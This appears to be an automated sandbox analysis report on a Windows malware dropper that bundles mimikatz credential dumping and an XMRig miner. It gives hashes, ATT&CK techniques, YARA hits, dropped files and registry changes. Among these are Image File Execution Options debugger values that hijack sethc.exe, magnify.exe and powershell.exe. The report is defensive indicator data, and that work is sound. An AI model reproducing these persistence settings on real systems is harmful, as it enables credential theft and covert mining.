mimikatz | c292c41a624026c8c157aaf8f197c57e4d62bf259d6933d382ddefd865006303

Analysis

max time kernel
150s
max time network
155s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
26-11-2024 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Size

4.3MB
MD5

fdcd0858c7855fe5d15be5345aec0c19
SHA1

5b260f84a9b4495ecfc255effae8c6365ca42a01
SHA256

c292c41a624026c8c157aaf8f197c57e4d62bf259d6933d382ddefd865006303
SHA512

f9102ccabc1e4e8446a1805499871a0c68240f5b23ef1df1ac4d9706600e525f55b57f63faea71c0bbae76437db4b487ced7b9ae76bab7d92895a76a1654af0c
SSDEEP

98304:rpuFB1/XTsJPZUIbzlMMvylQ6DxVEminfYzUhswFtmOb9G1:6jXKPZUWzlMMhEEminfYzhwH39

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 56 IoCs

miner

resource	yara_rule
behavioral1/memory/1060-70-0x000000013FC90000-0x000000013FD4D000-memory.dmp	xmrig
behavioral1/memory/2760-75-0x00000000004B0000-0x000000000059E000-memory.dmp	xmrig
behavioral1/memory/2684-107-0x000000013FAD0000-0x000000013FB8D000-memory.dmp	xmrig
behavioral1/memory/2412-117-0x000000013F780000-0x000000013F83D000-memory.dmp	xmrig
behavioral1/memory/1356-121-0x0000000002D90000-0x0000000002E4D000-memory.dmp	xmrig
behavioral1/memory/696-126-0x000000013FB50000-0x000000013FC0D000-memory.dmp	xmrig
behavioral1/memory/1668-135-0x000000013F110000-0x000000013F1CD000-memory.dmp	xmrig
behavioral1/memory/1356-140-0x0000000002D90000-0x0000000002E4D000-memory.dmp	xmrig
behavioral1/memory/2008-143-0x000000013FDF0000-0x000000013FEAD000-memory.dmp	xmrig
behavioral1/memory/1780-151-0x000000013F640000-0x000000013F6FD000-memory.dmp	xmrig
behavioral1/memory/884-161-0x000000013F570000-0x000000013F62D000-memory.dmp	xmrig
behavioral1/memory/2660-168-0x000000013F460000-0x000000013F51D000-memory.dmp	xmrig
behavioral1/memory/3004-176-0x000000013F800000-0x000000013F8BD000-memory.dmp	xmrig
behavioral1/memory/2876-183-0x000000013F600000-0x000000013F6BD000-memory.dmp	xmrig
behavioral1/memory/2608-192-0x000000013F6F0000-0x000000013F7AD000-memory.dmp	xmrig
behavioral1/memory/2808-199-0x000000013F5B0000-0x000000013F66D000-memory.dmp	xmrig
behavioral1/memory/2900-210-0x000000013F320000-0x000000013F3DD000-memory.dmp	xmrig
behavioral1/memory/1356-214-0x0000000002D90000-0x0000000002E4D000-memory.dmp	xmrig
behavioral1/memory/1536-217-0x000000013FB50000-0x000000013FC0D000-memory.dmp	xmrig
behavioral1/memory/2052-225-0x000000013F9A0000-0x000000013FA5D000-memory.dmp	xmrig
behavioral1/memory/1352-231-0x000000013F1B0000-0x000000013F26D000-memory.dmp	xmrig
behavioral1/memory/2584-235-0x000000013F940000-0x000000013F9FD000-memory.dmp	xmrig
behavioral1/memory/696-239-0x000000013F660000-0x000000013F71D000-memory.dmp	xmrig
behavioral1/memory/844-242-0x000000013F070000-0x000000013F12D000-memory.dmp	xmrig
behavioral1/memory/2460-246-0x000000013F630000-0x000000013F6ED000-memory.dmp	xmrig
behavioral1/memory/2268-250-0x000000013F030000-0x000000013F0ED000-memory.dmp	xmrig
behavioral1/memory/1356-251-0x0000000002D90000-0x0000000002E4D000-memory.dmp	xmrig
behavioral1/memory/332-255-0x000000013F830000-0x000000013F8ED000-memory.dmp	xmrig
behavioral1/memory/1620-258-0x000000013F950000-0x000000013FA0D000-memory.dmp	xmrig
behavioral1/memory/2988-262-0x000000013FB10000-0x000000013FBCD000-memory.dmp	xmrig
behavioral1/memory/3004-265-0x000000013F1A0000-0x000000013F25D000-memory.dmp	xmrig
behavioral1/memory/3800-276-0x000000013F610000-0x000000013F6CD000-memory.dmp	xmrig
behavioral1/memory/3600-280-0x000000013FFF0000-0x00000001400AD000-memory.dmp	xmrig
behavioral1/memory/2580-285-0x000000013F4E0000-0x000000013F59D000-memory.dmp	xmrig
behavioral1/memory/3740-290-0x000000013F7E0000-0x000000013F89D000-memory.dmp	xmrig
behavioral1/memory/1356-292-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/3660-295-0x000000013F9D0000-0x000000013FA8D000-memory.dmp	xmrig
behavioral1/memory/1356-296-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/1356-298-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/2272-301-0x000000013FB90000-0x000000013FC4D000-memory.dmp	xmrig
behavioral1/memory/1356-303-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/4128-306-0x000000013F360000-0x000000013F41D000-memory.dmp	xmrig
behavioral1/memory/1356-308-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/2684-311-0x000000013FD80000-0x000000013FE3D000-memory.dmp	xmrig
behavioral1/memory/1356-313-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/4876-315-0x000000013F800000-0x000000013F8BD000-memory.dmp	xmrig
behavioral1/memory/3920-320-0x000000013FD70000-0x000000013FE2D000-memory.dmp	xmrig
behavioral1/memory/2856-325-0x000000013F390000-0x000000013F44D000-memory.dmp	xmrig
behavioral1/memory/1356-326-0x0000000002B60000-0x0000000002C1D000-memory.dmp	xmrig
behavioral1/memory/4480-330-0x000000013FC70000-0x000000013FD2D000-memory.dmp	xmrig
behavioral1/memory/4116-332-0x000000013F780000-0x000000013F83D000-memory.dmp	xmrig
behavioral1/memory/4148-335-0x000000013FFF0000-0x00000001400AD000-memory.dmp	xmrig
behavioral1/memory/2956-345-0x000000013F820000-0x000000013F8DD000-memory.dmp	xmrig
behavioral1/memory/4972-352-0x000000013FB70000-0x000000013FC2D000-memory.dmp	xmrig
behavioral1/memory/3772-374-0x000000013F3F0000-0x000000013F4AD000-memory.dmp	xmrig
behavioral1/memory/4992-389-0x000000013FF80000-0x000000014003D000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 2 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001225c-1.dat	mimikatz
behavioral1/memory/580-87-0x000000013F710000-0x000000013F7FE000-memory.dmp	mimikatz

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 10 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Executes dropped EXE 64 IoCs

pid	Process
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1060	taskmgr.exe
580	vfshost.exe
2952	wimnat.exe
2452	ssssgc.exe
2684	taskmgr.exe
2412	taskmgr.exe
696	taskmgr.exe
1668	taskmgr.exe
2008	taskmgr.exe
1780	taskmgr.exe
884	taskmgr.exe
2660	taskmgr.exe
3004	taskmgr.exe
2876	taskmgr.exe
2608	taskmgr.exe
2808	taskmgr.exe
832	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2900	taskmgr.exe
1536	taskmgr.exe
2052	taskmgr.exe
1352	taskmgr.exe
2584	taskmgr.exe
696	taskmgr.exe
844	taskmgr.exe
2460	taskmgr.exe
2268	taskmgr.exe
332	taskmgr.exe
1620	taskmgr.exe
2988	taskmgr.exe
3004	taskmgr.exe
2728	GoogleCdoeUpdate.exe
3800	taskmgr.exe
3600	taskmgr.exe
2580	taskmgr.exe
3740	taskmgr.exe
3660	taskmgr.exe
2272	taskmgr.exe
4128	taskmgr.exe
2684	taskmgr.exe
4876	taskmgr.exe
3920	taskmgr.exe
2856	taskmgr.exe
4808	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
4480	taskmgr.exe
4116	taskmgr.exe
4148	taskmgr.exe
3392	taskmgr.exe
3024	taskmgr.exe
2956	taskmgr.exe
2912	dumpcore.exe
4972	taskmgr.exe
3672	taskmgr.exe
4416	dumpcore.exe
3728	dumpcore.exe
3772	taskmgr.exe
1060	dumpcore.exe
1596	dumpcore.exe
4992	taskmgr.exe
3448	dumpcore.exe
2488	dumpcore.exe
2384	taskmgr.exe
2560	taskmgr.exe
3408	dumpcore.exe

Loads dropped DLL 64 IoCs

pid	Process
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2760	cmd.exe
2760	cmd.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2756	cmd.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\SysWOW64\ssssgc.exe	wimnat.exe
File opened for modification	C:\Windows\SysWOW64\ssssgc.exe	wimnat.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001a4a9-63.dat	upx
behavioral1/memory/1060-67-0x000000013FC90000-0x000000013FD4D000-memory.dmp	upx
behavioral1/files/0x000500000001a49a-74.dat	upx
behavioral1/memory/1060-70-0x000000013FC90000-0x000000013FD4D000-memory.dmp	upx
behavioral1/memory/580-77-0x000000013F710000-0x000000013F7FE000-memory.dmp	upx
behavioral1/memory/2760-75-0x00000000004B0000-0x000000000059E000-memory.dmp	upx
behavioral1/memory/580-87-0x000000013F710000-0x000000013F7FE000-memory.dmp	upx
behavioral1/memory/2684-104-0x000000013FAD0000-0x000000013FB8D000-memory.dmp	upx
behavioral1/memory/2684-107-0x000000013FAD0000-0x000000013FB8D000-memory.dmp	upx
behavioral1/memory/2412-114-0x000000013F780000-0x000000013F83D000-memory.dmp	upx
behavioral1/memory/1356-113-0x00000000039F0000-0x0000000003AAD000-memory.dmp	upx
behavioral1/memory/2412-117-0x000000013F780000-0x000000013F83D000-memory.dmp	upx
behavioral1/memory/696-123-0x000000013FB50000-0x000000013FC0D000-memory.dmp	upx
behavioral1/memory/696-126-0x000000013FB50000-0x000000013FC0D000-memory.dmp	upx
behavioral1/memory/1668-132-0x000000013F110000-0x000000013F1CD000-memory.dmp	upx
behavioral1/memory/1668-135-0x000000013F110000-0x000000013F1CD000-memory.dmp	upx
behavioral1/memory/1356-140-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/2008-141-0x000000013FDF0000-0x000000013FEAD000-memory.dmp	upx
behavioral1/memory/2008-143-0x000000013FDF0000-0x000000013FEAD000-memory.dmp	upx
behavioral1/memory/1356-144-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/1780-149-0x000000013F640000-0x000000013F6FD000-memory.dmp	upx
behavioral1/memory/1780-151-0x000000013F640000-0x000000013F6FD000-memory.dmp	upx
behavioral1/memory/1356-152-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/1356-155-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/884-158-0x000000013F570000-0x000000013F62D000-memory.dmp	upx
behavioral1/memory/884-161-0x000000013F570000-0x000000013F62D000-memory.dmp	upx
behavioral1/memory/2660-166-0x000000013F460000-0x000000013F51D000-memory.dmp	upx
behavioral1/memory/2660-168-0x000000013F460000-0x000000013F51D000-memory.dmp	upx
behavioral1/memory/1356-169-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/3004-174-0x000000013F800000-0x000000013F8BD000-memory.dmp	upx
behavioral1/memory/3004-176-0x000000013F800000-0x000000013F8BD000-memory.dmp	upx
behavioral1/memory/2876-181-0x000000013F600000-0x000000013F6BD000-memory.dmp	upx
behavioral1/memory/2876-183-0x000000013F600000-0x000000013F6BD000-memory.dmp	upx
behavioral1/memory/2608-189-0x000000013F6F0000-0x000000013F7AD000-memory.dmp	upx
behavioral1/memory/2608-192-0x000000013F6F0000-0x000000013F7AD000-memory.dmp	upx
behavioral1/memory/2808-197-0x000000013F5B0000-0x000000013F66D000-memory.dmp	upx
behavioral1/memory/2808-199-0x000000013F5B0000-0x000000013F66D000-memory.dmp	upx
behavioral1/memory/2900-210-0x000000013F320000-0x000000013F3DD000-memory.dmp	upx
behavioral1/memory/2900-207-0x000000013F320000-0x000000013F3DD000-memory.dmp	upx
behavioral1/memory/1536-217-0x000000013FB50000-0x000000013FC0D000-memory.dmp	upx
behavioral1/memory/1356-218-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/2052-222-0x000000013F9A0000-0x000000013FA5D000-memory.dmp	upx
behavioral1/memory/2052-225-0x000000013F9A0000-0x000000013FA5D000-memory.dmp	upx
behavioral1/memory/1352-229-0x000000013F1B0000-0x000000013F26D000-memory.dmp	upx
behavioral1/memory/1352-231-0x000000013F1B0000-0x000000013F26D000-memory.dmp	upx
behavioral1/memory/2584-233-0x000000013F940000-0x000000013F9FD000-memory.dmp	upx
behavioral1/memory/2584-235-0x000000013F940000-0x000000013F9FD000-memory.dmp	upx
behavioral1/memory/696-237-0x000000013F660000-0x000000013F71D000-memory.dmp	upx
behavioral1/memory/696-239-0x000000013F660000-0x000000013F71D000-memory.dmp	upx
behavioral1/memory/844-241-0x000000013F070000-0x000000013F12D000-memory.dmp	upx
behavioral1/memory/844-242-0x000000013F070000-0x000000013F12D000-memory.dmp	upx
behavioral1/memory/2460-244-0x000000013F630000-0x000000013F6ED000-memory.dmp	upx
behavioral1/memory/2460-246-0x000000013F630000-0x000000013F6ED000-memory.dmp	upx
behavioral1/memory/2268-248-0x000000013F030000-0x000000013F0ED000-memory.dmp	upx
behavioral1/memory/2268-250-0x000000013F030000-0x000000013F0ED000-memory.dmp	upx
behavioral1/memory/1356-251-0x0000000002D90000-0x0000000002E4D000-memory.dmp	upx
behavioral1/memory/332-253-0x000000013F830000-0x000000013F8ED000-memory.dmp	upx
behavioral1/memory/332-255-0x000000013F830000-0x000000013F8ED000-memory.dmp	upx
behavioral1/memory/1620-257-0x000000013F950000-0x000000013FA0D000-memory.dmp	upx
behavioral1/memory/1620-258-0x000000013F950000-0x000000013FA0D000-memory.dmp	upx
behavioral1/memory/2988-260-0x000000013FB10000-0x000000013FBCD000-memory.dmp	upx
behavioral1/memory/2988-262-0x000000013FB10000-0x000000013FBCD000-memory.dmp	upx
behavioral1/memory/3004-264-0x000000013F1A0000-0x000000013F25D000-memory.dmp	upx
behavioral1/memory/3004-265-0x000000013F1A0000-0x000000013F25D000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\coli-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\trch-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\tucl-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\posh-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\svschost.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\zlib1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\AppCapture_x32.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\exma-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\spoolsrv.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\InfusedAppe\Corporate\log.txt	cmd.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\crli-0.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\AppCapture_x32.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\Priess\ip.txt	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\InfusedAppe\Priess\Result.txt	GoogleCdoeUpdate.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\ucl.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File opened for modification	C:\Windows\svschost.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\LocalService\specials\ssleay32.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\AppCapture_x64.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\svschost.xml	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\cnli-1.dll	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
File created	C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.exe	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
